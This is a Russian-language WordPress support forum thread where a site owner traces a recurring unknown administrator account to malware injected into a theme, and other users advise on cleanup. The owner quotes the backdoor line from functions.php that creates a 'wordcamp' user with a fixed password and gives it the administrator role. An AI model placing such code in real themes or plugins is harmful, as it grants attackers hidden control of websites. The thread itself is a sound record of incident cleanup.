Поддержка Проблемы и решения Неизвестный пользователь с ролью админа

Неизвестный пользователь с ролью админа

  • andreynec

    (@andreynec)


    2 года, 11 месяцев назад

    Здравствуйте. В админке есть второй пользователь с ролью администратора. Имя wordcamp, эл.почта wordcamp@wordpress.com. Пробовал удалить много раз, но он появляется снова, меняется только ID, увеличивается на 1.
    Что это за пользователь? Системный?
    Был плагин Wordfence Security. Удалил его, думал это плагин создает пользователя, нет.
    Из-под phpmyadmin тоже пробовал удалить, снова появляется

Просмотр 11 ответов — с 1 по 11 (всего 11)
  • Модератор Yui

    (@fierevere)

    ゆい

    2 года, 11 месяцев назад

    в WordPress нет «системных» пользователей.
    Вполне возможно что на сайте поселился зловредный код, который открывает кому-то бэкдор.

    https://ru.wordpress.org/support/article/faq-hacked/

    Автор andreynec

    (@andreynec)

    2 года, 11 месяцев назад

    Спасибо.
    Вот нашёл, где создается пользователь, в файле темы functions.php:
    $createuser = wp_create_user(‘wordcamp’, ‘218765z’, ‘wordcamp@wordpress.com’); $user_created = new WP_User($createuser); $user_created -> set_role(‘administrator’);

    Получается в теме дыра? С айболитом пока не справился, почему-то в корневой каталог не загружается, вернее загружается и сразу удаляется, ai-bolit-hoster.php
    Пишет вот так:
    550 Transfer aborted: virus ‘{HEX}php.gzbase64.inject.455.UNOFFICIAL’ detected

    • Ответ изменён 2 года, 11 месяцев назад пользователем andreynec.
    Модератор Yui

    (@fierevere)

    ゆい

    2 года, 11 месяцев назад

    Получается в теме дыра?

    именно так.

    virus ‘{HEX}php.gzbase64.inject.455

    если это ваш антивирус ругается на айболита, то если айболит с официального сайта скачан, то срабатывание ложное

    Автор andreynec

    (@andreynec)

    2 года, 11 месяцев назад

    Антивирус молчит. Это происходит в FileZilla, загрузка и моментальное удаление файла. Айболит скачал из статьи по ссылке: https://revisium.com/ai/.
    Virustotal и другие показывают, что чисто. Залил заново папки wp-admin, wp-includes.
    Поставил плагин All In One WP Security & Firewall, с контролем изменения файлов и другими настройками безопасности. Надеюсь, поможет защитить.

    • Ответ изменён 2 года, 11 месяцев назад пользователем andreynec.
    Anonymous User 17160716

    (@anonymized-17160716)

    2 года, 11 месяцев назад

    andreynec, приветствую.

    Получается в теме дыра?

    Да, но тут всё зависит от деталей. Либо сама тема была уже такой, либо кто-то модифицировал файл. Смотрите даты, если есть бэкапы, то сравнивайте код оригинала и версии на вашем сервере.

    С айболитом пока не справился, почему-то в корневой каталог не загружается, вернее загружается и сразу удаляется, ai-bolit-hoster.php
    Пишет вот так:
    550 Transfer aborted: virus ‘{HEX}php.gzbase64.inject.455.UNOFFICIAL’ detected

    Это происходит в FileZilla, загрузка и моментальное удаление файла.

    Это происходит на сервере, а FileZilla лишь интерпретирует ответ в виде ошибки. Немного глупая ситуация, да и «Ай-Болит» вам не поможет по ряду причин. Основная — он в принципе не реагирует на штатные функции создания пользователей в системе и пр., не говоря уже о том, что и малвари находит в лучшем случае треть от общего количества.

    Virustotal и другие показывают, что чисто.

    Потому что у них нет доступа к файлам, то есть метод тоже бесполезный. Сканируется только исходный код указанной страницы.

    Залил заново папки wp-admin, wp-includes.

    Хорошо, но бесполезно, если не вычистили лишний код из /wp-content/.

    Поставил плагин All In One WP Security & Firewall, с контролем изменения файлов

    Он довольно легко обходится 🙂

    Автор andreynec

    (@andreynec)

    2 года, 11 месяцев назад

    По фактам :). Спасибо. Буду вручную чистить wp-content.

    anonymized-17455437

    (@anonymized-17455437)

    2 года, 11 месяцев назад

    andreynec, ну как, получилось? 🙂

    Автор andreynec

    (@andreynec)

    2 года, 11 месяцев назад

    Да, вроде, пока тихо. Нашёл сторонний код только в двух файлах темы: functions.php и включаемом в него template-functions.php.
    Сменил пароли, имя админа wp, путь site.ru/wp-admin с помощью All In One WP Security & Firewall, остальные настройки в нём выставил. Пока работает.

    alenkarolik

    (@alenkarolik)

    2 года, 11 месяцев назад

    @andreynec, а как все-таки удалить этого пользователя?
    Вроде в functions.php и template-functions.php код почистила, но редиректы и дальше срабатывают.

    • Ответ изменён 2 года, 11 месяцев назад пользователем alenkarolik.
    Модератор Yui

    (@fierevere)

    ゆい

    2 года, 11 месяцев назад

    @subversa , решение проблем только на форуме. Просьбы написать куда-то можно только в разделе «Специалисты».

    Автор andreynec

    (@andreynec)

    2 года, 11 месяцев назад

    @alenkarolik, у меня в папке с темами ещё была одна левая тема и тема twenty, их обе удалил. После уже чистил файлы моей темы. После очистки пользователя удалил из консоли wordpress. Больше он не появлялся.

Просмотр 11 ответов — с 1 по 11 (всего 11)
  • Тема «Неизвестный пользователь с ролью админа» закрыта для новых ответов.

Просмотр